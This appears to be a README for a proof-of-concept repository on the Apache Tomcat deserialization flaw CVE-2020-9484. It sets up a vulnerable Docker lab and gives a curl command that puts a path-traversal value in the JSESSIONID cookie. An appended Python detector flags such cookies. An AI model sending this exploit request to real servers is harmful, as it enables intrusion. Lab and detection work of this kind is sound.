This project forked from coldfusionx/cve-2020-9484
POC - Apache Tomcat Deserialization Vulnerability (CVE-2020-9484)
cve-2020-9485's Introduction
Apache Tomcat Deserialization Vulnerability (CVE-2020-9484)
Vulnerable target setup
- Clone this repository
- Run
docker-compose up -d
- That's it!
Exploit POC
- Run
curl -v 'http://127.0.0.1:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../usr/local/tomcat/cfx'
- A file named coldfx gets created in the tmp directory
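
On the detection side, the request above stands out because the JSESSIONID cookie carries a relative file path instead of a session identifier. The Python check below is an added example, not part of the original repository; the function names and the sample Cookie headers are constructed for illustration.

```python
import re
from urllib.parse import unquote

# JSESSIONID value inside a Cookie header (Tomcat's default session cookie name).
_COOKIE_RE = re.compile(r"(?:^|;\s*)JSESSIONID=([^;]*)")

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so singly and doubly encoded values normalise."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def session_ids(cookie_header):
    """Return every JSESSIONID value present in one Cookie header."""
    return [m.group(1).strip().strip('"') for m in _COOKIE_RE.finditer(cookie_header)]

def is_suspicious(session_id):
    """A session id should never contain path separators or parent references."""
    decoded = decode_fully(session_id)
    return any(token in decoded for token in ("..", "/", "\\", "\x00"))

def scan(cookie_headers):
    """Return (entry_number, raw_value) for each JSESSIONID that looks like a path."""
    hits = []
    for n, header in enumerate(cookie_headers, 1):
        for sid in session_ids(header):
            if is_suspicious(sid):
                hits.append((n, sid))
    return hits

# Constructed sample Cookie headers; entry 3 is the value from the curl command above.
SAMPLE = [
    "JSESSIONID=5F3A9C0E1B2D4F6A8C7E9B0D1A2C3E4F",
    "theme=dark; JSESSIONID=5F3A9C0E1B2D4F6A8C7E9B0D1A2C3E4F.node1",
    "JSESSIONID=../../../../../usr/local/tomcat/cfx",
    "lang=en; JSESSIONID=..%2F..%2Fexample",
]

if __name__ == "__main__":
    for entry, value in scan(SAMPLE):
        print(f"entry {entry}: suspicious JSESSIONID {value!r}")
```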